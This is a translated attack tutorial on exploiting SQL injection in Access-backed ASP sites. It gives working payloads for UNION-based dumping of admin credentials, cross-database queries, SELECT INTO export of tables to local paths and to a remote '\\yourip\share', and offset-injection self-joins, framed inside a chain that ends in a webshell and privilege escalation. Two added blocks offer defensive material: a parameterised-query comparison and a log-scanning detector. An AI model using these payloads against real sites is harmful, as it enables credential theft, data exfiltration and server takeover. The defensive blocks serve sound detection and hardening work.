Advanced usage of Access injection points

Source: Internet
Author: User

I believe Access injection points are the kind everyone sees most often. The usual routine is:
Guess the tables, guess the content --- crack the MD5 --- log in to the admin back end --- look for upload, backup, settings and similar functions --- upload a WEBSHELL --- privilege escalation. This is the most common and popular way to use an ACCESS injection point. However, there are too many uncertainties and the success rate is very low; a failure at any step can stall the whole chain.

But is ACCESS only capable of this? The answer is no. Next, let's look at what can be improved and taken further. PS: I believe there are more techniques than these, but the people who created them are not willing to share them openly.

 


--------------------------------------------------------------
Union Query
The first thing to talk about is the query method. The common query method is
and 1=(select count(*) from admin where left(id,1)='1')
So from the start, even with various tools, you can only guess one character at a time and check whether each guess is correct. The problem is obvious: it is slow. Guessing a full 32-digit MD5 hash this way... you can have another cup of tea.
This is where the union select clause comes in. Do not think it can only be used in PHP...
For example, you have an ACCESS injection point:
http://www.bkjia.com/xiaoyang.asp?coder=1
You know that the admin table exists (a tool can quickly guess tables and fields),
Then we can directly use:
http://www.bkjia.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6... from admin [where coderx=1 (if a limiting query condition is needed)]
Keep adding numbers, starting from 1, until the page echoes normally. Then replace the echoed positions among 1~X with password, username and other fields, and the content is displayed directly. Much faster. The tea can be set down first and drunk once it has cooled.
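
The same flaw seen from the defending side, as an added example that is not part of the original article. sqlite3 stands in for the Access/Jet driver so the block runs offline; the articles table, the function names and all data are constructed. The string-built query lets a UNION clause append rows from admin, while the validated and parameterised version rejects it.

```python
import sqlite3

def make_db():
    # Constructed sample data; sqlite3 stands in for an Access .mdb file.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER, title TEXT, body TEXT);
        CREATE TABLE admin (id INTEGER, username TEXT, password TEXT);
        INSERT INTO articles VALUES (1, 'Hello', 'First post');
        INSERT INTO admin VALUES (1, 'root', 'CONSTRUCTED_MD5_HASH');
    """)
    return db

def fetch_vulnerable(db, coder):
    # Mirrors the classic ASP pattern "... where id=" & Request("coder"):
    # the parameter text becomes part of the SQL statement itself.
    sql = "SELECT id, title, body FROM articles WHERE id=" + coder
    return db.execute(sql).fetchall()

def fetch_hardened(db, coder):
    # 1) Accept only a short run of ASCII digits.
    # 2) Bind the value as a parameter, so it can never be parsed as SQL.
    if not (coder.isascii() and coder.isdigit() and len(coder) <= 9):
        raise ValueError("coder must be a positive integer")
    sql = "SELECT id, title, body FROM articles WHERE id=?"
    return db.execute(sql, (int(coder),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    probe = "1 union select 1, username, password from admin"
    print("vulnerable:", fetch_vulnerable(db, probe))
    try:
        fetch_hardened(db, probe)
    except ValueError as exc:
        print("hardened:", exc)
    print("hardened, valid id:", fetch_hardened(db, "1"))
```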

 

---------------------------------------------------------------
Access Cross-Database Query
Suppose a site operator happens to run two or more systems on one website. One of them has an ACCESS injection point, but you could not escalate privileges from its back end. The other system has no injection point, but it has the functions you need. This is where cross-database queries come in. Of course, they can also be used for MDB overflow and penetration; their usefulness is unexpected.
Cross-database query statements:
Subquery:
and (select count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
Union query:
union select 1,2,3,4... from admin in "D:\xioatianyang\okok.asa" where id=1
Cross-database queries are useful for more than this, so everyone can keep exploring. Here is a link to a reference article:
http://www.bkjia.com/Article/200507/5869.html

---------------------------------------------------------------
Access injection: exporting to txt, htm, html
Subquery statement:
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
In this way, the content of the admin table is saved under d:\web.
UNION query:
union select * into [admin.txt] in 'C:\' 'test;' from admin
In addition, the target can be a remote share:
SELECT * into [test.txt] in '\\yourip\share' 'text;' from admin
However, many people have tested this themselves: it works without problems against a local database, but at a real injection point the subquery form reports that there is no permission, and the UNION form echoes the error that an action query cannot be used as a row source. So it is still difficult... The reason is probably that UNION applies only to select queries, and an action query cannot follow UNION. This forum has a post on the topic:
http://www.bkjia.com/viewthread.php?tid=3016&extra=page%3D7
Because there is a lot of material about this on the internet, I have only introduced it briefly. If this operation succeeds, then in theory we only need to know the table name, not the field names, to see all of the table content. It might even be possible to write files such as .php or .asp into the web directory. This technique will continue to develop.


---------------------------------------------------------------
Access offset Injection
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)

union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on a.id=d.id)
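
All four techniques in this article (UNION query, cross-database query, SELECT INTO export, offset injection) leave a recognisable shape in the web server's request log. The triage script below is an added example, not part of the original article; the rule names, the assumed log field order and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# One rule per technique in the article, applied to the URL-decoded,
# lower-cased, whitespace-collapsed query string. Rule names are hypothetical.
RULES = {
    # UNION SELECT appended to a parameter value
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    # [path\file.ext].table, or IN '<drive or UNC path>' naming another database
    "external-db-path": re.compile(
        r"\[[^\]]+\.\w{2,4}\]\s*\.\s*\w+|\bin\s+[\"'](?:[a-z]:\\|\\\\)"),
    # SELECT ... INTO [file] IN ... (export to txt/htm/html)
    "select-into-export": re.compile(r"\bselect\b.*\binto\s+\[[^\]]+\]\s+in\b"),
    # (t AS a INNER JOIN t AS b ...): a table joined to itself
    "self-join-offset": re.compile(
        r"\(\s*(\w+)\s+as\s+\w+\s+inner\s+join\s+\1\s+as\b"),
}

def classify(query):
    """Return the sorted names of the rules that match one raw query string."""
    text = re.sub(r"\s+", " ", unquote_plus(query)).lower()
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan(log_lines):
    """Return (line_no, uri, rule_names) for each suspicious log line.
    Assumed field order: date time method uri query status."""
    findings = []
    for line_no, line in enumerate(log_lines, 1):
        parts = line.split()
        if line.startswith("#") or len(parts) < 6:
            continue
        matched = classify(parts[4])
        if matched:
            findings.append((line_no, parts[3], matched))
    return findings

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    "2024-05-01 10:00:01 GET /xiaoyang.asp coder=1 200",
    "2024-05-01 10:00:09 GET /xiaoyang.asp coder=1+union+select+1,2,3+from+admin 200",
    "2024-05-01 10:00:15 GET /xiaoyang.asp coder=1+and+(select+count(*)+from+%5Bd:%5Csite%5Cother.mdb%5D.test)%3E0 500",
    "2024-05-01 10:00:21 GET /xiaoyang.asp coder=1+union+select+*+into+%5Badmin.txt%5D+in+'c:%5C'+'text;'+from+admin 500",
    "2024-05-01 10:00:30 GET /xiaoyang.asp coder=1+union+select+1,2,*+from+(admin+as+a+inner+join+admin+as+b+on+a.id=b.id) 200",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The rules only see the logged query string, so parameters sent in POST bodies or cookies need the same checks applied at the application or WAF layer.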
